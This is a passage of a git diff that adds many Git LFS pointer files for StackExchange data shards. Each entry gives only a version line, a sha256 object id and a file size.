/dev/null +++ b/data/stackexchange/1-1/2200_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4b7636e694a3a781b5d0cc416009e407034a6fb37d11d729375e4ab5d1528dff +size 39863995 diff --git a/data/stackexchange/1-1/2201_2289.jsonl b/data/stackexchange/1-1/2201_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..95ba7cde2b15538c5b3e6abee9f47a00b8773680 --- /dev/null +++ b/data/stackexchange/1-1/2201_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2224277b306e964516bbe73c98a4440afde0b58bb69cf4289bcf0f85e00dedef +size 39545188 diff --git a/data/stackexchange/1-1/2202_2289.jsonl b/data/stackexchange/1-1/2202_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3bad02522eac69be3c49687bf8e3bacd8601973a --- /dev/null +++ b/data/stackexchange/1-1/2202_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:19ca17c9dc1a856aa2514e2118bb12b9988f3d67ca04115b2cd6483249d3b503 +size 39313004 diff --git a/data/stackexchange/1-1/2203_2289.jsonl b/data/stackexchange/1-1/2203_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4ad1580c16aa4167cbbbe01e48f0f07ff678dffe --- /dev/null +++ b/data/stackexchange/1-1/2203_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cded776bc1478a68c71bb821d15e95a04155605d64357aa07afbc0a9ccb72898 +size 39794539 diff --git a/data/stackexchange/1-1/2204_2289.jsonl b/data/stackexchange/1-1/2204_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eab68b3b35478442a716ca220e98f1e24f1a9117 --- /dev/null +++ b/data/stackexchange/1-1/2204_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:55197cb6b1b8d5861d330fc3ca7ddceee125b7a031708b21011a7541e4c364f3 +size 39322307 diff --git a/data/stackexchange/1-1/2205_2289.jsonl b/data/stackexchange/1-1/2205_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..49f8043789ae3b26fd0bf1473dde53b2eca8dbe8 --- /dev/null +++ b/data/stackexchange/1-1/2205_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9c96eaf29c25ddb39e330ad2150f25603d3024165cb6ddc81b22143a4f1f809 +size 39558163 diff --git a/data/stackexchange/1-1/2206_2289.jsonl b/data/stackexchange/1-1/2206_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4a35812dd8c9e5844ec72c20323d8c90374b8841 --- /dev/null +++ b/data/stackexchange/1-1/2206_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3926d1de4982055b2571da857f7fd8a4c5b90db9156af0ea9535edaa40bcb088 +size 39515147 diff --git a/data/stackexchange/1-1/2207_2289.jsonl b/data/stackexchange/1-1/2207_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bd8313e4505e876f0dc7a8096fe0992ddf5c698d --- /dev/null +++ b/data/stackexchange/1-1/2207_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:03061b298a8d6244f1aea68d72b0f408fd8fd7a9ed4eb09be6ecdd1da0930bd2 +size 39298733 diff --git a/data/stackexchange/1-1/2208_2289.jsonl b/data/stackexchange/1-1/2208_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..680dcfdd5b176ca264b4ee2d3757cb664add66b4 --- /dev/null +++ b/data/stackexchange/1-1/2208_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f86d7d12d930bb2f681465ad5ebfde905ec32239386e9f8a5b5453f3ed88467 +size 40003814 diff --git a/data/stackexchange/1-1/2209_2289.jsonl b/data/stackexchange/1-1/2209_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..32d0d74013629270cafbdb816ada177895c15b23 --- /dev/null +++ b/data/stackexchange/1-1/2209_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:844f892a02f40e565fec21e4d607ff5c16e0546a23ca725eb0ff1b7c3cce6685 +size 39756774 diff --git a/data/stackexchange/1-1/220_2289.jsonl b/data/stackexchange/1-1/220_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..853b8012d8cf2dbf08115655a133db74447f9d91 --- /dev/null +++ b/data/stackexchange/1-1/220_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:03aeabceea36ec9584097c4d25d9710981fb0fe8d4035404da5e10637d3e6722 +size 37644563 diff --git a/data/stackexchange/1-1/2210_2289.jsonl b/data/stackexchange/1-1/2210_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9d9ff51ebd646a672b77ac23a7eb5e1b857cc699 --- /dev/null +++ b/data/stackexchange/1-1/2210_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:edf2fb99417ea5fceeca073279e89c9788b81664959428cb7137ed943cc22cdc +size 39883086 diff --git a/data/stackexchange/1-1/2211_2289.jsonl b/data/stackexchange/1-1/2211_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7f5b0b3e2af7618f844765bc2b318f3241eb8631 --- /dev/null +++ b/data/stackexchange/1-1/2211_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b1fc764e34ecd7c756280ae089607a4e6d75eceaa1dc7747bb736102fe18a956 +size 39780737 diff --git a/data/stackexchange/1-1/2212_2289.jsonl b/data/stackexchange/1-1/2212_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ad85fec3dd12bf3ad6d03a02b544b60346d5e76d --- /dev/null +++ b/data/stackexchange/1-1/2212_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:09891bf332f25c1ed0d6456947f1b579333e676a5b8697e2e03fa7a7a4e80390 +size 39145004 diff --git a/data/stackexchange/1-1/2213_2289.jsonl b/data/stackexchange/1-1/2213_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d6b6514cb9507df9eb564d81af79542362bcef65 --- /dev/null +++ b/data/stackexchange/1-1/2213_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:64bf552d70038c9c8e96f255b7cf50f72682edcd68a0459cb487993f1bb4ac76 +size 39648904 diff --git a/data/stackexchange/1-1/2214_2289.jsonl b/data/stackexchange/1-1/2214_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..552340b8df19d88d4062b57b4f20b226eda384b5 --- /dev/null +++ b/data/stackexchange/1-1/2214_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8dbbcec51cd6294f6f8d284f3227bc160553772d341906243120ad3427ba1aa1 +size 39241361 diff --git a/data/stackexchange/1-1/2215_2289.jsonl b/data/stackexchange/1-1/2215_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..12e23d18ee7f77ac07005ac0311f1e5753c54be2 --- /dev/null +++ b/data/stackexchange/1-1/2215_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e51e316af5ef68dfc61b87ad20e2c62baae12989fdf73f0c9cbbe53e1475c17b +size 39969566 diff --git a/data/stackexchange/1-1/2216_2289.jsonl b/data/stackexchange/1-1/2216_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..54b71fea1ef0b0c7057eb495edd0418e5b04f880 --- /dev/null +++ b/data/stackexchange/1-1/2216_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:962ac9543ea0b8466ca2be9b7c6865d1bdf3f1243125c08abc61cba3e98dc750 +size 39527426 diff --git a/data/stackexchange/1-1/2217_2289.jsonl b/data/stackexchange/1-1/2217_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..39c726571b08b1607266c4f755353a3a8f11764e --- /dev/null +++ b/data/stackexchange/1-1/2217_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:34be745bf988188a5eb912a45b4237b192b3471f139f7d4a8d5800f10dcb63af +size 39684938 diff --git a/data/stackexchange/1-1/2218_2289.jsonl b/data/stackexchange/1-1/2218_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1c5e227d2cc0a97a88a3aead36c1014a78263276 --- /dev/null +++ b/data/stackexchange/1-1/2218_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3014776eacece5ae3af14a7e18fa06fc55e602c62f9c90a3b54ee3a35e555e0d +size 39293533 diff --git a/data/stackexchange/1-1/2219_2289.jsonl b/data/stackexchange/1-1/2219_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..790aa47b185835fdf1cfa25bfec6264bc16963d6 --- /dev/null +++ b/data/stackexchange/1-1/2219_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6bb3184cec0da43087e434f73d6b136df1756bea7b4e509292185ab3158b9f35 +size 40154396 diff --git a/data/stackexchange/1-1/221_2289.jsonl b/data/stackexchange/1-1/221_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1c496be9d662fbbab535c6b88a11f56b9f13576b --- /dev/null +++ b/data/stackexchange/1-1/221_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ba83066d8ddeec55f6d463dff26d8c7e53dac1afaa9984c3c1c06a3f5ee3baa6 +size 38086761 diff --git a/data/stackexchange/1-1/2220_2289.jsonl b/data/stackexchange/1-1/2220_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c92911604ecfd50f53a7f2be3496cf8d7073e69c --- /dev/null +++ b/data/stackexchange/1-1/2220_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4fc7947c7f4bad4ba155a54c8ae89b785b2b1eeb10299aa392fe88ad1353d848 +size 39729998 diff --git a/data/stackexchange/1-1/2221_2289.jsonl b/data/stackexchange/1-1/2221_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c0b5ef24e0640b78dad6b871425aa0f0cf975751 --- /dev/null +++ b/data/stackexchange/1-1/2221_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:638d59e3bb8a4ad82837845683145f12b7e1105ba735f661641e9f729e2a9b7f +size 39591620 diff --git a/data/stackexchange/1-1/2222_2289.jsonl b/data/stackexchange/1-1/2222_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..739dcb7bde04ae985ce6b394a431a66d01a3b42a --- /dev/null +++ b/data/stackexchange/1-1/2222_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7594473f944de56b691d158ea149752e66088745f722e335b4160b1f9b5c906a +size 39410068 diff --git a/data/stackexchange/1-1/2223_2289.jsonl b/data/stackexchange/1-1/2223_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..12ccc3a342de10322a8cfa7d4fe6f169c062d55d --- /dev/null +++ b/data/stackexchange/1-1/2223_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:87ace75243d01de34d79a1ceeb96c76825371f63bd6938d72b6312e63ad88500 +size 39786169 diff --git a/data/stackexchange/1-1/2224_2289.jsonl b/data/stackexchange/1-1/2224_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2696cdb5fc6342f285a85c23cafc1e97d3ce5c71 --- /dev/null +++ b/data/stackexchange/1-1/2224_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2df35213f5818a310ad544257e103865dd5e06649acbe760ea377b6bf5085bc2 +size 39161713 diff --git a/data/stackexchange/1-1/2225_2289.jsonl b/data/stackexchange/1-1/2225_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b83690925e05b7c3094627cae9e7b2a9ef5526de --- /dev/null +++ b/data/stackexchange/1-1/2225_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0b2f3d352c771a78b9d938192fda49cf57dec190bd230452adbe9af200e0faa6 +size 40150785 diff --git a/data/stackexchange/1-1/2226_2289.jsonl b/data/stackexchange/1-1/2226_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3dd5afb519f9d6107310f37dff6d1d510325cbe2 --- /dev/null +++ b/data/stackexchange/1-1/2226_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c67736027fa4107252831a4392123e9689ded3b242cf89e2cd01d0844bc2050a +size 39638768 diff --git a/data/stackexchange/1-1/2227_2289.jsonl b/data/stackexchange/1-1/2227_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..19832a519a87c0a465d2931e02ec09e4354c7676 --- /dev/null +++ b/data/stackexchange/1-1/2227_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c2adf6a280c3afa43bd896c25472f7e3029fbe7791df79422e6126fb04d0fff7 +size 40090795 diff --git a/data/stackexchange/1-1/2228_2289.jsonl b/data/stackexchange/1-1/2228_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aac14fa25eff644f0dc577bd90e45cc68cc283fa --- /dev/null +++ b/data/stackexchange/1-1/2228_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7008f4a6e2022fbc2755f71a62a7cd98a7ab169f3623a37ff635e9013f89604d +size 39653151 diff --git a/data/stackexchange/1-1/2229_2289.jsonl b/data/stackexchange/1-1/2229_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..88a062140373a9bd960c34b67ab5152576a5cbc2 --- /dev/null +++ b/data/stackexchange/1-1/2229_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2932a3c008ba781b6ae4998c50d35c0f665de0a15a8ff45767d3a051b9327318 +size 39920676 diff --git a/data/stackexchange/1-1/222_2289.jsonl b/data/stackexchange/1-1/222_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..69d82d17d3c14ffbfd6dbccd1bc9b0f1a257fd77 --- /dev/null +++ b/data/stackexchange/1-1/222_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:348ffb5aabe11262acc9fc2b80dd9eb92ecf64711ae98df7c852406d6da9dd64 +size 39102445 diff --git a/data/stackexchange/1-1/2230_2289.jsonl b/data/stackexchange/1-1/2230_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..90944b5c6d6b2549421dcc5c77b279d317782a7f --- /dev/null +++ b/data/stackexchange/1-1/2230_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e1e3bdbe191a9aa6b666002136d197fd62359b837831a35f0425d75257b2c583 +size 39741309 diff --git a/data/stackexchange/1-1/2231_2289.jsonl b/data/stackexchange/1-1/2231_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4e63eaf6c22586607eee654eecf30edfa945b3fd --- /dev/null +++ b/data/stackexchange/1-1/2231_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aee8f8d5049a0c7d66867396c3ec021cb98ad808e467f0eb659290005f5b8b98 +size 40176170 diff --git a/data/stackexchange/1-1/2232_2289.jsonl b/data/stackexchange/1-1/2232_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4969c33a040ec33d2b02b329042fda20726d02cd --- /dev/null +++ b/data/stackexchange/1-1/2232_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f2297edbdf5acf88cb3711f7e708712360853cdc06e3bb6d950d6f65a6bcfaeb +size 40002862 diff --git a/data/stackexchange/1-1/2233_2289.jsonl b/data/stackexchange/1-1/2233_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f23931f86ab77194a22b5f7e27da0b3ac4555b86 --- /dev/null +++ b/data/stackexchange/1-1/2233_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9a011e3c54be5b39bcec0755adde21c5fdbc6cffb87c0f4e9c4e5b1a40176720 +size 39187476 diff --git a/data/stackexchange/1-1/2234_2289.jsonl b/data/stackexchange/1-1/2234_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aa4c5262a906078fec394d45238fbf4daf986654 --- /dev/null +++ b/data/stackexchange/1-1/2234_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8999a5fa0cb2bd2e6fe8a49de8e77c6c5c370097203562a66f42c9ea517c1186 +size 39276079 diff --git a/data/stackexchange/1-1/2235_2289.jsonl b/data/stackexchange/1-1/2235_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b8122bf7036ee38b2448861a91457df04f26fe98 --- /dev/null +++ b/data/stackexchange/1-1/2235_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8adc1b22f2204bb50422a2c3ac9dce23adedf93172dd08250f9a5394f776f286 +size 40341592 diff --git a/data/stackexchange/1-1/2236_2289.jsonl b/data/stackexchange/1-1/2236_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..35880ad9983408bec292f25e5e4320b1dcc5e944 --- /dev/null +++ b/data/stackexchange/1-1/2236_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:39eab767ba3fa56f1f6b01e546f56a267ece986dd954b690416ee3176be2813d +size 39762391 diff --git a/data/stackexchange/1-1/2237_2289.jsonl b/data/stackexchange/1-1/2237_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cd937f8a0f410d701e33615b2c9588c9438c686d --- /dev/null +++ b/data/stackexchange/1-1/2237_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71363a850b59b882b78145b9b5b2ae517e2237d819f8d8648fd4f696595d54ef +size 39676045 diff --git a/data/stackexchange/1-1/2238_2289.jsonl b/data/stackexchange/1-1/2238_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..67f10fb7fdcff7d20b48ae28b7f0bf35efaf115b --- /dev/null +++ b/data/stackexchange/1-1/2238_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a5959564c5d720b057b93a222c9d0ce60e10976959607bb3165278c7ace8cc4a +size 39491587 diff --git a/data/stackexchange/1-1/2239_2289.jsonl b/data/stackexchange/1-1/2239_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eff33b7ab16ffcdbbda72fa63e7edf9b807471f6 --- /dev/null +++ b/data/stackexchange/1-1/2239_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:734cac33ebca86d36e44410867f8af08488412ec1dd4ae39c1996838680ce910 +size 37361549 diff --git a/data/stackexchange/1-1/223_2289.jsonl b/data/stackexchange/1-1/223_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1f0cb8ff6b9eb5be476e1a8b49b01751dd556e26 --- /dev/null +++ b/data/stackexchange/1-1/223_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f87740466a0795c48872809a41048b2ee23b742e95680d62c00998d96ea7c6b +size 38235602 diff --git a/data/stackexchange/1-1/2240_2289.jsonl b/data/stackexchange/1-1/2240_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ed18bfed588bb2b34f13cb960ade5faf201dbea3 --- /dev/null +++ b/data/stackexchange/1-1/2240_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bca2b6ee7bd87725c2f8167ac4f4e96ba8af756766231b0fd302f7b9d64ab566 +size 37097820 diff --git a/data/stackexchange/1-1/2241_2289.jsonl b/data/stackexchange/1-1/2241_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e0c70acc403861671617991f4c34d41510d33eb6 --- /dev/null +++ b/data/stackexchange/1-1/2241_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a5243694bcc6e95c71565e083e04fb6ee31e024b0b3ce8b974370f851ab22379 +size 37885817 diff --git a/data/stackexchange/1-1/2242_2289.jsonl b/data/stackexchange/1-1/2242_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bfd6bac2730c9410a23918ea489e9f67e46f14df --- /dev/null +++ b/data/stackexchange/1-1/2242_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7b26dd543676ec58f5f68d554fafaf0c7c5ef5aa52fc9fbe9e1915bf6e410fae +size 37272140 diff --git a/data/stackexchange/1-1/2243_2289.jsonl b/data/stackexchange/1-1/2243_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c5d1e0b6645980ca282054797250610bd52c915c --- /dev/null +++ b/data/stackexchange/1-1/2243_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:95627253c96d15aa53bbeb391ebdc2bfef353d6d6fb69f15239009da374da4e7 +size 37796979 diff --git a/data/stackexchange/1-1/2244_2289.jsonl b/data/stackexchange/1-1/2244_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d091a505926b21707579ab6653cc0a9e45efa48c --- /dev/null +++ b/data/stackexchange/1-1/2244_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e4bc413b0a37c4d83181c9b4f61b58deac321bf6531502ede7528d5db2f36dce +size 37339596 diff --git a/data/stackexchange/1-1/2245_2289.jsonl b/data/stackexchange/1-1/2245_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..24b51c9bb83a262df3daf16a0c30a25456611102 --- /dev/null +++ b/data/stackexchange/1-1/2245_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f8931c5ccc59298c05eaa226999cb320f02be8e6fe6daf0c41cf5630ff564ce4 +size 38052724 diff --git a/data/stackexchange/1-1/2246_2289.jsonl b/data/stackexchange/1-1/2246_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..851527019e1c77118ea0fa31bad1e8ef138394f1 --- /dev/null +++ b/data/stackexchange/1-1/2246_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3dcd7fede914c77f382708bd8eeb36ee8c5ed195b2e458038e132478e7260dc8 +size 37577992 diff --git a/data/stackexchange/1-1/2247_2289.jsonl b/data/stackexchange/1-1/2247_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1ebfa58b8d4e7229a617855535d44b9f849e5418 --- /dev/null +++ b/data/stackexchange/1-1/2247_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:65681c6068e8a3638e954e7461c83e202d6f46589c8c21a881d4ff78e4d1ccce +size 37316612 diff --git a/data/stackexchange/1-1/2248_2289.jsonl b/data/stackexchange/1-1/2248_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..99f6a5b9c03ae57717af33844b5a2f128bfbc8f6 --- /dev/null +++ b/data/stackexchange/1-1/2248_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f5896fcd7d3305334182dccbee797061112fa5595ebfddd8bfb5302973f5083 +size 38024718 diff --git a/data/stackexchange/1-1/2249_2289.jsonl b/data/stackexchange/1-1/2249_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fa15d951bd6ced35b51dcc1de8675d2d899a2e95 --- /dev/null +++ b/data/stackexchange/1-1/2249_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1c15d559d572eefc658c5e105c51488dc24cd8c03ef73a528be705d2e933eff8 +size 37438852 diff --git a/data/stackexchange/1-1/224_2289.jsonl b/data/stackexchange/1-1/224_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..080f835a8caf25c7276d495d61842e29d3abbe2c --- /dev/null +++ b/data/stackexchange/1-1/224_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3efc3caf591d9a3237e8f42670da98fea7d34807751ced788bf2adc7bc9098c6 +size 37342072 diff --git a/data/stackexchange/1-1/2250_2289.jsonl b/data/stackexchange/1-1/2250_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..50697ac0b165f67936db6b708bad7534163b09b9 --- /dev/null +++ b/data/stackexchange/1-1/2250_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:59b38160460b71ac54a103aadcdc90891084b47e1f0f81dec610d8f07ce91c19 +size 37346379 diff --git a/data/stackexchange/1-1/2251_2289.jsonl b/data/stackexchange/1-1/2251_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..060eb2ee405eafcc4877281052c8f5ae942a37ab --- /dev/null +++ b/data/stackexchange/1-1/2251_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:794a955b254ea9829e7f5141ad17c0f89a1186f79e51f6524f0eb9ff91bbcece +size 37960503 diff --git a/data/stackexchange/1-1/2252_2289.jsonl b/data/stackexchange/1-1/2252_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0ca3f9a23ce0bb88cdb4615786850d8ecad49800 --- /dev/null +++ b/data/stackexchange/1-1/2252_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2d833d8681bcc9989ab8923a5cfce706d8ca4d2a5c1401e3a1d69150c756626b +size 37012196 diff --git a/data/stackexchange/1-1/2253_2289.jsonl b/data/stackexchange/1-1/2253_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..488fc0cde4f3fd21fb868f36851d097e7a1d10a4 --- /dev/null +++ b/data/stackexchange/1-1/2253_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7f61f5cba25f4df129be7b505a8a84737051575ab5f0ba0dc98f415455ae303 +size 37616875 diff --git a/data/stackexchange/1-1/2254_2289.jsonl b/data/stackexchange/1-1/2254_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d1c72a44d980a0920a1c813c627d4f9bc79389e8 --- /dev/null +++ b/data/stackexchange/1-1/2254_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fe2678a5576ce98c877294378a9bc6042bae82faaa31709deae3e667cf230bce +size 37847573 diff --git a/data/stackexchange/1-1/2255_2289.jsonl b/data/stackexchange/1-1/2255_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aa619b0c60a3451b5253e4881f686c05682e81f8 --- /dev/null +++ b/data/stackexchange/1-1/2255_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e197be897b3b97e22983a8d4378a00b5ffa4f3a8fbe1d2524a295b4db301a861 +size 37815569 diff --git a/data/stackexchange/1-1/2256_2289.jsonl b/data/stackexchange/1-1/2256_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3c954fc611e3c7ae234501aa06014e45cb63333a --- /dev/null +++ b/data/stackexchange/1-1/2256_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e1fb9e0a410668ca93ad8d78a36b923bf3a161307aee5815e919553d9f1a3476 +size 37829580 diff --git a/data/stackexchange/1-1/2257_2289.jsonl b/data/stackexchange/1-1/2257_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..17ce07a5c26f5ebbf7074e00ee91dfca9ee577e7 --- /dev/null +++ b/data/stackexchange/1-1/2257_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8588edc225700918270df48c5aba12e370dd9abc1e981722535be87a8c86c8e2 +size 37556537 diff --git a/data/stackexchange/1-1/2258_2289.jsonl b/data/stackexchange/1-1/2258_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..516fd2e24c0ec8979f587d91a2103e3c5d0de232 --- /dev/null +++ b/data/stackexchange/1-1/2258_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bfdc2e8d5c249e28a5a04b16bec2f0e9be0fac2e73a6d09777b4f430ff990448 +size 37306879 diff --git a/data/stackexchange/1-1/2259_2289.jsonl b/data/stackexchange/1-1/2259_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a79aa63f9e2edc24442ac3d4d7796b40729ae084 --- /dev/null +++ b/data/stackexchange/1-1/2259_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bbfda2b56f63d03c5ae65b46e5337af45fb67f83a05dd13305d87040ce51bcea +size 36899901 diff --git a/data/stackexchange/1-1/225_2289.jsonl b/data/stackexchange/1-1/225_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bd0045ce161076b4f6165f9b106db300367a1a12 --- /dev/null +++ b/data/stackexchange/1-1/225_2289.jsonl @@ -0,0 +1,3 @@ +version 